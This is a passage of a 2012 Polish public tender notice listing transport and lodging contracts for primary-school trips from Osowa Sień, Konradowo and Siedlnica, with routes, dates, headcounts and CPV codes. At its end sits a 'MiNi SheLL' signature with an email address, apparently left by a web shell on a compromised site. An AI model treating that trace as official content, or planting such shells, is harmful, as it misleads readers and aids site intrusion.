<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> USŁUGA TRANSPORTU DLA UCZNIÓW SZKOŁY PODSTAWOWEJ W OSOWEJ SIENI PODCZAS WYCIECZKI SZKOLNEJ DO KOŁOBRZEGU..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Termin realizacji zamówienia: od 07.06.2012 r. do 10.06.2012 r.
- 4 dni
Miejsce wykonania obejmuje trasę docelową, powrotną: Osowa Sień-Dębowa Łęka-Kołobrzeg- Dębowa Łęka-Osowa Sień oraz trasę dot. realizacji programu wycieczki. .
Trasa: Osowa Sień -Dębowa Łęka-Kołobrzeg- Dębowa Łęka-Osowa Sień - około 850 km 
Jazdy lokalne: około 100 km.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.27.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 07.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> USLUGA ZAKWATEROWANIA I WYŻYWIENIA DLA UCZNIÓW SZKOŁY PODSTAWOWEJ W OSOWEJ SIENI PODCZAS WYCIECZKI SZKOLNEJ DO KRAKOWA:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Świadczenie usługi zakwaterowania i wyżywienia dla uczniów Szkoły Podstawowej w Osowej Sieni podczas wycieczki do Krakowa. 

Termin realizacji zamówienia: 
od 30.06.2012 r. do 03.07.2012 r.- 4 dni (3 noclegi)

Zakwaterowanie: 
Miejsce zakwaterowania: Kraków 

Planowana ilość osób do zakwaterowania: 41 (36 uczniów + 4 opiekunów + 1 kierowca). Zamawiający zastrzega możliwość dokonania zmian ilościowych.

Wyżywienie: 
Planowana ilość osób do wyżywienia: 41 (36 uczniów + 4 opiekunów + 1 kierowca). Zamawiający zastrzega możliwość dokonania zmian ilościowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.27.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 30.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> USŁUGA TRANSPORTU DLA UCZNIÓW SZKOŁY PODSTAWOWEJ W OSOWEJ SIENI PODCZAS WYCIECZKI SZKOLNEJ DO KRAKOWA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Termin realizacji zamówienia: 
od 30.06.2012 r. do 03.07.2012 r.- 4 dni 
Miejsce wykonania zależne obejmuje trasę docelową, powrotną: Osowa Sień-Dębowa Łęka-Kraków- Dębowa Łęka-Osowa Sień oraz trasę dot. realizacji programu wycieczki.
Trasa: Osowa Sień-Dębowa Łęka-Kraków- Dębowa Łęka-Osowa Sień - około 900 km
Jazdy lokalne: około 250  km.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 30.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> USŁUGA ZAKWATEROWANIA I WYŻYWIENIA DLA UCZNIÓW SZKOŁY PODSTAWOWEJ W KONRADOWIE PODCZAS WYCIECZKI SZKOLNEJ DO KARPACZA..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Świadczenie usługi zakwaterowania i wyżywienia dla uczniów Szkoły Podstawowej w Konradowie podczas wycieczki do Karpacza. 

Termin realizacji zamówienia: 
od 7.06.2012 do 10.06.2012 r. 4 dni (3 noclegi)

Zakwaterowanie: 
Miejsce zakwaterowania: Karpacz 

Planowana ilość osób do zakwaterowania: 44 (39 uczniów + 4 opiekunów + 1 kierowca). Zamawiający zastrzega możliwość dokonania zmian ilościowych.

Wyżywienie: 
Planowana ilość osób do wyżywienia: 44 (39 uczniów + 4 opiekunów + 1 kierowca). Zamawiający zastrzega możliwość dokonania zmian ilościowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.27.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 07.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> USŁUGA TRANSPORTU DLA UCZNIÓW SZKOŁY PODSTAWOWEJ W KONRADOWIE PODCZAS WYCIECZKI SZKOLNEJ DO KARPACZA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Termin realizacji zamówienia: 
od 7.06.2012 do 10.06.2012 r. 4 dni (3 noclegi)
Miejsce wykonania zależne obejmuje trasę docelową, powrotną: Konradowo - Karpacz - Konradowo oraz trasę dot. realizacji programu wycieczki.
Trasa: Konradowo - Karpacz - Konradowo - około 310 km
Jazdy lokalne: około 110 km.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 07.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> USŁUGA ZAKWATEROWANIA I WYŻYWIENIA DLA UCZNIÓW SZKOŁY PODSTAWOWEJ W KONRADOWIE PODCZAS WYCIECZKI SZKOLNEJ DO KRAKOWA..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Świadczenie usługi zakwaterowania i wyżywienia dla uczniów Szkoły Podstawowej w Konradowie podczas wycieczki do Krakowa. 

Termin realizacji zamówienia: 
od 30.06.2012 do 03.07.2012 r. 4 dni (3 noclegi)

Zakwaterowanie: 
Miejsce zakwaterowania: Kraków 

Planowana ilość osób do zakwaterowania: 44 (39 uczniów + 4 opiekunów+ 1 kierowca). Zamawiający zastrzega możliwość dokonania zmian ilościowych.

Wyżywienie: 
Planowana ilość osób do wyżywienia: 44 (39 uczniów + 4 opiekunów + 1 kierowca). Zamawiający zastrzega możliwość dokonania zmian ilościowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.27.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 30.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> USŁUGA TRANSPORTU DLA UCZNIÓW SZKOŁY PODSTAWOWEJ W KONRADOWIE PODCZAS WYCIECZKI SZKOLNEJ DO KRAKOWA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Termin realizacji zamówienia: 
od 30.06.2012 do 03.07.2012 r. 4 dni (3 noclegi)
Miejsce wykonania zależne obejmuje trasę docelową, powrotną: Konradowo-Kraków- Konradowo oraz trasę dot. realizacji programu wycieczki.
Trasa: Konradowo - Kraków - Konradowo - około 790 km
Jazdy lokalne: około 200 km.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 30.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> USŁUGA ZAKWATEROWANIA I WYŻYWIENIA DLA UCZNIÓW SZKOŁY PODSTAWOWEJ W SIEDLNICY PODCZAS WYCIECZKI SZKOLNEJ DO TRÓJMIASTA..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Świadczenie usługi zakwaterowania i wyżywienia dla uczniów Szkoły Podstawowej w Siedlnicy podczas wycieczki do Trójmiasta. 

Termin realizacji zamówienia: 
od 03.05.2012 do 06.05.2012 r. 4 dni (3 noclegi)

Zakwaterowanie: 

Miejsce zakwaterowania: jedno z miast Trójmiasta

Planowana ilość osób do zakwaterowania: 50 (45 uczniów + 4 opiekunów+ 1 kierowca). Zamawiający zastrzega możliwość dokonania zmian ilościowych.

Wyżywienie: 
Planowana ilość osób do wyżywienia: 50 (45 uczniów + 4 opiekunów + 1 kierowca). Zamawiający zastrzega możliwość dokonania zmian ilościowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.27.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 03.05.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> USŁUGA TRANSPORTU DLA UCZNIÓW SZKOŁY PODSTAWOWEJ W SIEDLNICY PODCZAS WYCIECZKI SZKOLNEJ DO TRÓJMIASTA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Termin realizacji zamówienia: 
od 03.05.2012 do 06.05.2012 r. 4 dni (3 noclegi)

Miejsce wykonania obejmuje trasę docelową, powrotną: Siedlnica-Trójmiasto- Siedlnica oraz trasę dot. realizacji programu wycieczki.
Trasa: Siedlnica - Trójmiasto - Siedlnica - około 1000  km
Jazdy lokalne: około 300  km.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 03.05.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> USŁUGA ZAKWATEROWANIA I WYŻYWIENIA DLA UCZNIÓW SZKOŁY PODSTAWOWEJ W SIEDLNICY PODCZAS WYCIECZKI SZKOLNEJ DO WARSZAWY..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Świadczenie usługi zakwaterowania i wyżywienia dla uczniów Szkoły Podstawowej w Siedlnicy podczas wycieczki do Warszawy. 

Termin realizacji zamówienia: 
od 27.08.2012 r.  do 30.08.2012 r. 4 dni (3 noclegi)

Zakwaterowanie: 
Miejsce zakwaterowania: Warszawa - lub jej okolice położone do 20 km od granic miasta. 

Planowana ilość osób do zakwaterowania: 50 (45 uczniów + 4 opiekunów+ 1 kierowca). Zamawiający zastrzega możliwość dokonania zmian ilościowych.

Wyżywienie: 
Planowana ilość osób do wyżywienia: 50 (45 uczniów + 4 opiekunów + 1 kierowca). Zamawiający zastrzega możliwość dokonania zmian ilościowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.27.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 27.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> USŁUGA TRANSPORTU DLA UCZNIÓW SZKOŁY PODSTAWOWEJ W SIEDLNICY PODCZAS WYCIECZKI SZKOLNEJ DO WARSZAWY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Termin realizacji zamówienia: 
od 27.08.2012 r.  do 30.08.2012 r. 4 dni (3 noclegi)
Miejsce wykonania zależne obejmuje trasę docelową, powrotną: Siedlnica-Warszawa- Siedlnica oraz trasę dot. realizacji programu wycieczki. 
Trasa: Siedlnica - Warszawa - Siedlnica - około 850 km
Jazdy lokalne: około 200 km.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 27.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com